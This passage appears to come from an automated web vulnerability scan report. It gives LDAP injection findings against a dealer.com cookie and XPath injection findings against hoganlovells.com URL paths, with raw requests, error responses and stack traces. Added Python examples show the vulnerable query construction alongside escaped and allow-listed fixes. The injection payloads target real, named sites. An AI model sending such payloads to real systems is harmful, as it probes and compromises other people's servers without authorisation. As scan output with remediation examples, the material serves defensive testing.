<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>From website performance, to more visitors and more conversions, everything we were looking for improvement from has improved.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We were able to have our design and brand vision executed. It is very important that we look the way we want to look and that we represent our company and our brand in a specific way and Dealer.com accomplished that. &#8230;</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The back-end tool is one of the simplest I've seen. It's like working with a Microsoft Office program. Everything is easily spelled out for you.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>It was very important to find someone with a suite of products that could not only help us today, but could help us in the long term.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Total Control Dominator has really helped us out, and the fact that it is integrated with a lot of other functions on the website is very helpful.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_1.jpg" alt="Recapture lost customers & Increase Service Revenue with Service Marketing" /></a>
</li>

<li>
   <a href="/products/inventory
...[SNIP]...

Request 2

GET /solutions/agencies/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/agencies/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=*)!(sn=*; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003120; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fproducts%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.55.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20125
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:23:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003379; expires=Mon, 16-Apr-2012 01:22:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>From technology, to innovation, to support, I've had an extremely positive experience with Dealer.com.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Total Control Dominator has really helped us out, and the fact that it is integrated with a lot of other functions on the website is very helpful.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Since we've had a Dealer.com website our traffic has increased, our conversion has increased, and our website ranking is great. If you Google &#8220;used cars in Denver,&#8221; we are always on top.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="C
...[SNIP]...

1.12. http://www.dealer.com/solutions/oem/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/ cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /solutions/oem/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads 405dbe54cabfaef5)(sn=* and 405dbe54cabfaef5)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./products/ cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /solutions/oem/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/oem/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=405dbe54cabfaef5)(sn=*; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003121; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fsolutions%2Foem%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A3%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fproducts%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.56.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19967
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:22:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003378; expires=Mon, 16-Apr-2012 01:22:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Ranked #8 in the nation in April and #12 YTD (up from 16th last year), you and your team have been leading our progress.</p>
   <cite>Ken Girard, McGrath Acura of Westmont</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The number of visitors has doubled since we went on board nearly a year and a half ago.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The back-end tool is one of the simplest I've seen. It's like working with a Microsoft Office program. Everything is easily spelled out for you.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The backend administrative system is just so easy and fast to use.</p>
   <cite>Greg Nalewaja, General Manager, Metro Honda of Union County</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We&#8217;re getting more qualified traffic to our website. We&#8217;re getting more qualified leads and we&#8217;re closing a higher percentage of them.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-a
...[SNIP]...

Request 2

GET /solutions/oem/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/oem/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=405dbe54cabfaef5)!(sn=*; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003121; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fsolutions%2Foem%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A3%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fproducts%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.56.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19998
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:23:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003379; expires=Mon, 16-Apr-2012 01:22:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>We were looking for an all-in-one solution&#8212;one company with expertise in all the different fields. That is why we chose Dealer.com. </p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>It was very important to find someone with a suite of products that could not only help us today, but could help us in the long term.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Whether you are 1000 miles away or whether you&#8217;re 100 miles away, you really feel that you&#8217;re part of this Dealer.com family.</p>
   <cite>Christopher Della Bella, D&#8217;Ella Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From an Enterprise Level, Dealer.com's products have saved me hours a month in gathering my reporting and understanding what our site is doing for us. </p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile
...[SNIP]...
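
Added example (Python, not code from the XSS.CX report or from Dealer.com) showing what findings 1.10 to 1.12 probe for. The filter shape (&(uid=...)(objectClass=person)) and the attribute name uid are assumptions; the report only shows the payloads. The first payload, *)(sn=*, closes the uid assertion and appends (sn=*), leaving a filter that still parses but carries one clause more than intended, while *)!(sn=* leaves a stray ! that no RFC 4515 parser accepts. A backend that really built the filter this way would therefore answer the two requests differently, which is the heuristic the scanner relies on. Escaping the value with RFC 4515 hex sequences turns both payloads into plain assertion values. The block also carries a small triage helper: the 404 page in these findings embeds a rotating testimonial and advert carousel (compare Response 1 and Response 2 of 1.10, which differ in Content-Length and in the quoted testimonials), so responses to identical input already differ, which is why the confidence is Tentative and why the bodies should be normalised before the comparison is trusted. The two HTML fragments at the bottom are constructed for the example, modelled on the captured responses.

```python
"""Added example, not code from the XSS.CX report or from Dealer.com.

Reproduces what findings 1.10-1.12 test for: a cookie value dropped into a
conjunctive LDAP filter. The filter shape (&(uid=...)(objectClass=person))
and the attribute name 'uid' are assumptions; the report only shows the
payloads. The mini parser follows the RFC 4515 search filter grammar.
"""
import re

# RFC 4515 section 3: characters that must be escaped inside an assertion
# value, written as a backslash followed by two hex digits.
_LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_ldap_filter_value(value: str) -> str:
    """Neutralise filter metacharacters so the value can only match literally."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def build_filter_naive(uid: str) -> str:
    """Vulnerable pattern: untrusted input concatenated straight into the filter."""
    return f"(&(uid={uid})(objectClass=person))"


def build_filter_safe(uid: str) -> str:
    """Hardened form: same filter, value escaped first."""
    return f"(&(uid={escape_ldap_filter_value(uid)})(objectClass=person))"


_ITEM_RE = re.compile(r"([A-Za-z][A-Za-z0-9.;-]*)(~=|>=|<=|=)")


def parse_filter(text: str):
    """Parse an RFC 4515 search filter into a tree, or raise ValueError.

    Composite nodes are (op, [children]) with op in '&', '|', '!';
    assertions are (op, attribute, value). Because '(' and ')' inside a
    value must be escaped, the next literal ')' always ends the value.
    """
    def parse(i: int):
        if i >= len(text) or text[i] != "(":
            raise ValueError(f"expected '(' at offset {i}")
        i += 1
        if i >= len(text):
            raise ValueError("unexpected end of filter")
        if text[i] in "&|":
            op, i, kids = text[i], i + 1, []
            while i < len(text) and text[i] == "(":
                child, i = parse(i)
                kids.append(child)
            if not kids:
                raise ValueError("empty filter list")
            node = (op, kids)
        elif text[i] == "!":
            child, i = parse(i + 1)
            node = ("!", [child])
        else:
            m = _ITEM_RE.match(text, i)
            if not m:
                raise ValueError(f"bad assertion at offset {i}")
            i = m.end()
            j = text.find(")", i)
            if j < 0:
                raise ValueError("unterminated assertion value")
            node = (m.group(2), m.group(1), text[i:j])  # '(uid=*)' is a presence test
            i = j
        if i >= len(text) or text[i] != ")":
            raise ValueError(f"expected ')' at offset {i}")
        return node, i + 1

    node, end = parse(0)
    if end != len(text):
        raise ValueError("trailing data after filter")
    return node


def filter_is_well_formed(text: str) -> bool:
    try:
        parse_filter(text)
        return True
    except ValueError:
        return False


def count_assertions(node) -> int:
    """Number of attribute assertions in a parsed filter; an injected clause adds one."""
    if node[0] in ("&", "|", "!"):
        return sum(count_assertions(child) for child in node[1])
    return 1


# Triage helper for the 'different responses' heuristic: the 404 page in the
# report carries a rotating testimonial/advert carousel, so two responses to
# identical input differ anyway. Strip those blocks before comparing bodies.
_ROTATING_RE = re.compile(r'<blockquote>.*?</blockquote>|<ul id="ads" class="cycle">.*?</ul>', re.S)


def normalize_404(body: str) -> str:
    return _ROTATING_RE.sub("", body)


# Constructed fragments modelled on the report's 404 responses (not captured data).
RESPONSE_A = ('<title>404 | Dealer.com</title><li class="odd"><blockquote><p>Tech Support is '
              'phenomenal.</p><cite>Mike Nazworth</cite></blockquote></li>'
              '<ul id="ads" class="cycle"><li><a href="/products/websites/videosmartsites/">x</a></li></ul>')
RESPONSE_B = ('<title>404 | Dealer.com</title><li class="odd"><blockquote><p>Our sites perform '
              'better now than they ever have.</p><cite>Cassie Broemmer</cite></blockquote></li>'
              '<ul id="ads" class="cycle"><li><a href="/products/websites/videoblog/">y</a></li></ul>')

if __name__ == "__main__":
    for payload in ("*)(sn=*", "*)!(sn=*"):
        for build in (build_filter_naive, build_filter_safe):
            f = build(payload)
            ok = filter_is_well_formed(f)
            n = count_assertions(parse_filter(f)) if ok else "n/a"
            print(f"{build.__name__:19} {f!r:48} well-formed={ok} assertions={n}")
    print("bodies identical after normalisation:", normalize_404(RESPONSE_A) == normalize_404(RESPONSE_B))
```

Running it prints the four payload/builder combinations: the naive filter with *)(sn=* parses with three assertions instead of two, the naive filter with *)!(sn=* does not parse at all, and both escaped variants parse with exactly two. The RFC 4515 escaping is the fix only if the value has to reach a search filter in the first place; a page-visit tracking cookie has no business in an LDAP query, and a strict allow-list on the cookie value is the simpler control. The normalisation step is the check to run before reporting: if the two responses still differ after the carousel blocks are stripped, the finding deserves a manual retest; if they match, the scanner was diffing marketing copy.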

2. XPath injection
There are 32 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.



2.1. http://www.hoganlovells.com/AboutUs/Online_Client [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /AboutUs')waitfor%20delay'0%3a0%3a20'--/Online_Client HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:22:19 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6683
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='aboutus')waitfor%20delay'0:0:20'--/online_client']' has an invalid token.</title>
<style>
body {font-fa
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus')waitfor%20delay'0:0:20'--/online_client']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus')waitfor%20delay'0:0:20'--/online_client']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...
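
Added example (Python, not code from hoganlovells.com or from the report) built around the expression disclosed in the exception above, //Site[@NavID='1039']//Page[@VirtualPath='...']: the stack trace shows the request path being lowercased and concatenated into a single-quoted string literal, which is why a lone ' yields "This is an unclosed string." and the longer payload yields "has an invalid token." The function names, the allow-list and the handling of NavID are assumptions about what a fix would look like, not the site's code. Quoting each value with xpath_literal (the concat() construction, needed because XPath 1.0 string literals have no escape sequence) gives the same expression for clean input and a well-formed one for the payloads; rejecting path segments outside an allow-list stops hostile input before it reaches the query at all.

```python
"""Added example, not code from hoganlovells.com or from the XSS.CX report.

The exception text in finding 2.1 shows the URL path being lowercased and
concatenated into //Site[@NavID='...']//Page[@VirtualPath='...']. This
reproduces that construction, shows the hardened form, and adds the checks
a reviewer would want. Function names and the allow-list are assumptions.
"""
import re


def xpath_literal(value: str) -> str:
    """Return an XPath 1.0 expression that evaluates to exactly `value`.

    XPath 1.0 string literals have no escape sequence, so a value holding
    both quote kinds must be assembled with concat().
    """
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    parts = value.split("'")
    pieces = []
    for idx, part in enumerate(parts):
        if part:
            pieces.append(f"'{part}'")
        if idx < len(parts) - 1:
            pieces.append('"\'"')  # the single quote, as a double-quoted literal
    return "concat(" + ", ".join(pieces) + ")"


def build_query_naive(nav_id: str, virtual_path: str) -> str:
    """Vulnerable pattern matching the reported exception: string concatenation."""
    return f"//Site[@NavID='{nav_id}']//Page[@VirtualPath='{virtual_path.lower()}']"


def build_query_safe(nav_id: str, virtual_path: str) -> str:
    """Same query with both values quoted as literals; identical output for clean input."""
    return (f"//Site[@NavID={xpath_literal(nav_id)}]"
            f"//Page[@VirtualPath={xpath_literal(virtual_path.lower())}]")


# Assumed allow-list; it covers every path segment seen in findings 2.1-2.3.
_SEGMENT_RE = re.compile(r"[A-Za-z0-9_-]+")


def segment_is_safe(segment: str) -> bool:
    """Allow-list check for one REST URL path segment."""
    return _SEGMENT_RE.fullmatch(segment) is not None


def virtual_path_from_segments(segments) -> str:
    """Defence in depth: reject a segment before it can reach the query at all."""
    bad = [s for s in segments if not segment_is_safe(s)]
    if bad:
        raise ValueError(f"rejected path segment(s): {bad!r}")
    return "/".join(segments).lower()


def has_unclosed_string(expr: str) -> bool:
    """Lexer-level check mirroring the 'This is an unclosed string.' failure.

    Walks the expression tracking whether we are inside a '...' or "..."
    literal; a literal still open at end of input is the injection symptom.
    It does not parse XPath, so it will not flag the 'invalid token' case.
    """
    quote = None
    for ch in expr:
        if quote is None:
            if ch in "'\"":
                quote = ch
        elif ch == quote:
            quote = None
    return quote is not None


if __name__ == "__main__":
    for payload in ("AboutUs/Online_Client'", "AboutUs')waitfor delay'0:0:20'--/Online_Client"):
        naive = build_query_naive("1039", payload)
        safe = build_query_safe("1039", payload)
        print("naive:", naive, "| unclosed literal:", has_unclosed_string(naive))
        print("safe: ", safe, "| unclosed literal:", has_unclosed_string(safe))
    print(virtual_path_from_segments(["AboutUs", "Online_Client"]))
```

has_unclosed_string only mirrors the scanner failure from 2.2 and 2.3; it does not parse XPath, so the invalid-token case from 2.1 (where the parser stops at the injected ")" before reaching the end) is not flagged by it, and it is a triage aid rather than a defence. In the ASP.NET stack shown in the trace, the equivalent of parameterisation is to compile the expression once with XPathExpression.Compile, using a variable such as $path in place of the literal, and supply the value through an XsltContext whose ResolveVariable returns it, instead of building the expression string per request. Either way the error page itself should go: the 500 response echoes the full query and stack trace, which is what made this finding Firm.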

2.2. http://www.hoganlovells.com/AboutUs/Online_Client [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /AboutUs/Online_Client' HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:22:20 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...

2.3. http://www.hoganlovells.com/AboutUs/Online_Client_Service/Overview/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client_Service/Overview/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /AboutUs'/Online_Client_Service/Overview/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:21:40 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8252
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

